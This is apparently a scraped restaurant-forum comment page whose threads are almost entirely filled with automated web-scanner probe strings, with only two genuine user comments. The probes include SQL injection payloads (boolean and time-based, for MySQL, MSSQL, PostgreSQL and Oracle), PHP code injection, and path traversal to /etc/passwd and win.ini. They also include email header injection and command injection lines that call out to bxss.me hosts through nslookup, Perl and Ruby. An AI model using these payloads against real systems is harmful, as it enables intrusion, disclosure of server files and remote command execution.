\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
WEB-INF/web.xml
re: Justeat
';print(md5(31337));$a='
re: Justeat
WEB-INF\web.xml
re: Justeat
";print(md5(31337));$a="
re: Justeat
${@print(md5(31337))}
re: Justeat
'"
re: Justeat
${@print(md5(31337))}\
re: Justeat
<!--
re: Justeat
'.print(md5(31337)).'
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+327-327-1=0+0+0+1 --
re: Justeat
-1 OR 3+327-327-1=0+0+0+1 --
re: Justeat
-1 OR 2+624-624-1=0+0+0+1
re: Justeat
-1 OR 3+624-624-1=0+0+0+1
re: Justeat
-1' OR 2+659-659-1=0+0+0+1 --
re: Justeat
-1' OR 3+659-659-1=0+0+0+1 --
re: Justeat
-1' OR 2+701-701-1=0+0+0+1 or 'o1tsCtqn'='
re: Justeat
-1' OR 3+701-701-1=0+0+0+1 or 'o1tsCtqn'='
re: Justeat
-1" OR 2+729-729-1=0+0+0+1 --
re: Justeat
-1" OR 3+729-729-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
NpcIqvdO'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 886=(SELECT 886 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 787=(SELECT 787 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 394=(SELECT 394 FROM PG_SLEEP(15))--
re: Justeat
pm92XVVJ' OR 541=(SELECT 541 FROM PG_SLEEP(15))--
re: Justeat
SclszVp6') OR 527=(SELECT 527 FROM PG_SLEEP(15))--
re: Justeat
h1WVgwnR')) OR 421=(SELECT 421 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@iuy1Z
how about no frill French restaurants? New, classic, or even home cooking style are fine, but preferably the master chef still cooks himself or herself. Thanks!
re: SU2021
Na4kS0MS
re: SU2021
1*
re: SU2021
1*
re: SU2021
1*
re: SU2021
1*
re: SU2021
-1 OR 2+558-558-1=0+0+0+1
re: SU2021
-1 OR 3+558-558-1=0+0+0+1
re: SU2021
JRanzP3B
re: SU2021
1*
re: SU2021
1*
re: SU2021
if(now()=sysdate(),sleep(15),0)
re: SU2021
1*
re: SU2021
1*
re: SU2021
-1 OR 2+632-632-1=0+0+0+1
re: SU2021
-1 OR 3+632-632-1=0+0+0+1
re: SU2021
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: SU2021
if(now()=sysdate(),sleep(15),0)
re: SU2021
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: SU2021
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: SU2021
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: SU2021
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: SU2021
-1; waitfor delay '0:0:15' --
re: SU2021
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: SU2021
-1); waitfor delay '0:0:15' --
re: SU2021
-1; waitfor delay '0:0:15' --
re: SU2021
1 waitfor delay '0:0:15' --
re: SU2021
-1); waitfor delay '0:0:15' --
re: SU2021
3BlUv7ic'; waitfor delay '0:0:15' --
re: SU2021
1 waitfor delay '0:0:15' --
re: SU2021
-5 OR 532=(SELECT 532 FROM PG_SLEEP(15))--
re: SU2021
CWO5hRcQ'; waitfor delay '0:0:15' --
re: SU2021
-5) OR 926=(SELECT 926 FROM PG_SLEEP(15))--
re: SU2021
-5 OR 199=(SELECT 199 FROM PG_SLEEP(15))--
re: SU2021
-1)) OR 837=(SELECT 837 FROM PG_SLEEP(15))--
re: SU2021
-5) OR 406=(SELECT 406 FROM PG_SLEEP(15))--
re: SU2021
HLzpH81l' OR 520=(SELECT 520 FROM PG_SLEEP(15))--
re: SU2021
-1)) OR 32=(SELECT 32 FROM PG_SLEEP(15))--
re: SU2021
EfK9DMaW') OR 575=(SELECT 575 FROM PG_SLEEP(15))--
re: SU2021
VIcufZ8h' OR 807=(SELECT 807 FROM PG_SLEEP(15))--
re: SU2021
Z9qa870N')) OR 459=(SELECT 459 FROM PG_SLEEP(15))--
re: SU2021
9DPH6D7p') OR 564=(SELECT 564 FROM PG_SLEEP(15))--
re: SU2021
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: SU2021
UnIagMqT')) OR 73=(SELECT 73 FROM PG_SLEEP(15))--
re: SU2021
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: SU2021
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: SU2021
'||(select 1 from (select pg_sleep(15))x)||'
re: SU2021
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: SU2021
''||(select 1 from (select pg_sleep(15))x)||''
re: SU2021
1'"
re: SU2021
@@klMjh
re: SU2021
'||(select 1 from (select pg_sleep(15))x)||'
re: SU2021
''||(select 1 from (select pg_sleep(15))x)||''
re: SU2021
1'"
re: SU2021
@@aQ9kY
re: SU2021
1CbCLXdiO
re: SU2021
response.write(9442581*9374057)
re: SU2021
'+response.write(9442581*9374057)+'
re: SU2021
"+response.write(9442581*9374057)+"
re: SU2021
%0abcc:074625.67-16693.67.0d137.19990.2@bxss.me
re: SU2021
to@example.com>%0d%0abcc:074625.67-16694.67.0d137.19990.2@bxss.me
re: SU2021
../../../../../../../../../../../../../../etc/passwd
re: SU2021
../../../../../../../../../../../../../../windows/win.ini
re: SU2021
file:///etc/passwd
re: SU2021
<esi:include src="http://bxss.me/rpb.png"/>
re: SU2021
../../../../../../../../../../../../../../../proc/version
re: SU2021
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: SU2021
../../../../../../../../../../etc/passwd%00.jpg
re: SU2021
${10000464+9999020}
re: SU2021
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: SU2021
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: SU2021
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: SU2021
/etc/passwd
re: SU2021
echo qoxhij$()\ ovaydb\nz^xyu||a #' &echo qoxhij$()\ ovaydb\nz^xyu||a #|" &echo qoxhij$()\ ovaydb\nz^xyu||a #
re: SU2021
%2fetc%2fpasswd
re: SU2021
&echo qrbvjg$()\ gxprsr\nz^xyu||a #' &echo qrbvjg$()\ gxprsr\nz^xyu||a #|" &echo qrbvjg$()\ gxprsr\nz^xyu||a #
re: SU2021
/.././.././.././.././.././.././.././../etc/./passwd%00
re: SU2021
|echo hoqjra$()\ vpbtvq\nz^xyu||a #' |echo hoqjra$()\ vpbtvq\nz^xyu||a #|" |echo hoqjra$()\ vpbtvq\nz^xyu||a #
re: SU2021
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: SU2021
(nslookup hitooehnhmyquaf400.bxss.me||perl -e "gethostbyname('hitooehnhmyquaf400.bxss.me')")
re: SU2021
)
re: SU2021
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: SU2021
$(nslookup hitejqhwxpwkhd0736.bxss.me||perl -e "gethostbyname('hitejqhwxpwkhd0736.bxss.me')")
re: SU2021
!(()&&!|*|*|
re: SU2021
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: SU2021
&nslookup hitfivcllgjsa9e48e.bxss.me&'\"`0&nslookup hitfivcllgjsa9e48e.bxss.me&`'
re: SU2021
^(#$!@#$)(()))******
re: SU2021
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: SU2021
&(nslookup hitzizjyisggdfbea6.bxss.me||perl -e "gethostbyname('hitzizjyisggdfbea6.bxss.me')")&'\"`0&(nslookup hitzizjyisggdfbea6.bxss.me||perl -e "gethostbyname('hitzizjyisggdfbea6.bxss.me')")&`'
re: SU2021
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: SU2021
|(nslookup hitdcpulmtykr78063.bxss.me||perl -e "gethostbyname('hitdcpulmtykr78063.bxss.me')")
re: SU2021
file:///etc/passwd
re: SU2021
`(nslookup hitzmovwtxgno1e114.bxss.me||perl -e "gethostbyname('hitzmovwtxgno1e114.bxss.me')")`
re: SU2021
/\../\../\../\../\../\../\../etc/passwd
re: SU2021
;(nslookup hitmmcomajkmt609ff.bxss.me||perl -e "gethostbyname('hitmmcomajkmt609ff.bxss.me')")|(nslookup hitmmcomajkmt609ff.bxss.me||perl -e "gethostbyname('hitmmcomajkmt609ff.bxss.me')")&(nslookup hitmmcomajkmt609ff.bxss.me||perl -e "gethostbyname('hitmmcomajkmt609ff.bxss.me')")
re: SU2021
/WEB-INF/web.xml
re: SU2021
C:\WINDOWS\system32\drivers\etc\hosts
re: SU2021
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: SU2021
../../../../../../../../../../windows/win.ini%00.jpg
re: SU2021
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: SU2021
/../../../../../../../../../../boot.ini
re: SU2021
Http://bxss.me/t/fit.txt
re: SU2021
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: SU2021
'.gethostbyname(lc('hitvy'.'xchmpqbx4054b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(79).chr(98).chr(75).'
re: SU2021
http://bxss.me/t/fit.txt%3F.jpg
re: SU2021
..\..\..\..\..\..\..\..\windows\win.ini
re: SU2021
".gethostbyname(lc("hitek"."fcymqsio39586.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(89).chr(115).chr(90)."
re: SU2021
/etc/shells
re: SU2021
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: SU2021
c:/windows/win.ini
re: SU2021
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: SU2021
bxss.me
re: SU2021
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: SU2021
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: SU2021
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: SU2021
WEB-INF/web.xml
re: SU2021
WEB-INF\web.xml
re: SU2021
HttP://bxss.me/t/xss.html?%00
re: SU2021
"+"A".concat(70-3).concat(22*4).concat(103).concat(80).concat(101).concat(87)+(require"socket"
Socket.gethostbyname("hitdn"+"coptpbtxdfb06.bxss.me.")[3].to_s)+"
re: SU2021
bxss.me/t/xss.html?%00
re: SU2021
'+'A'.concat(70-3).concat(22*4).concat(107).concat(66).concat(121).concat(86)+(require'socket'
Socket.gethostbyname('hithi'+'kgqzzkbsfef39.bxss.me.')[3].to_s)+'
re: SU2021
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: SU2021
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: SU2021
'"
re: SU2021
';print(md5(31337));$a='
re: SU2021
<!--
re: SU2021
";print(md5(31337));$a="
re: SU2021
${@print(md5(31337))}
re: SU2021
${@print(md5(31337))}\
re: SU2021
'.print(md5(31337)).'
re: SU2021
1
re: SU2021
1
re: SU2021
-1 OR 2+181-181-1=0+0+0+1 --
re: SU2021
-1 OR 3+181-181-1=0+0+0+1 --
re: SU2021
-1 OR 2+151-151-1=0+0+0+1
re: SU2021
-1 OR 3+151-151-1=0+0+0+1
re: SU2021
-1' OR 2+129-129-1=0+0+0+1 --
re: SU2021
-1' OR 3+129-129-1=0+0+0+1 --
re: SU2021
-1' OR 2+519-519-1=0+0+0+1 or 'cgerrL6g'='
re: SU2021
-1' OR 3+519-519-1=0+0+0+1 or 'cgerrL6g'='
re: SU2021
-1" OR 2+521-521-1=0+0+0+1 --
re: SU2021
-1" OR 3+521-521-1=0+0+0+1 --
re: SU2021
if(now()=sysdate(),sleep(15),0)
re: SU2021
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: SU2021
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: SU2021
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: SU2021
-1; waitfor delay '0:0:15' --
re: SU2021
-1); waitfor delay '0:0:15' --
re: SU2021
1 waitfor delay '0:0:15' --
re: SU2021
Gj071gf8'; waitfor delay '0:0:15' --
re: SU2021
-5 OR 747=(SELECT 747 FROM PG_SLEEP(15))--
re: SU2021
-5) OR 984=(SELECT 984 FROM PG_SLEEP(15))--
re: SU2021
-1)) OR 824=(SELECT 824 FROM PG_SLEEP(15))--
re: SU2021
jJ3lpGS8' OR 871=(SELECT 871 FROM PG_SLEEP(15))--
re: SU2021
z0hWFE8C') OR 568=(SELECT 568 FROM PG_SLEEP(15))--
re: SU2021
OMM8oAEg')) OR 361=(SELECT 361 FROM PG_SLEEP(15))--
re: SU2021
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: SU2021
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: SU2021
'||(select 1 from (select pg_sleep(15))x)||'
re: SU2021
''||(select 1 from (select pg_sleep(15))x)||''
re: SU2021
1'"
re: SU2021
@@27piZ
@su2021 that’s a great idea! Could you please help share your list?
re: Justeat
sm6ulz7V
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
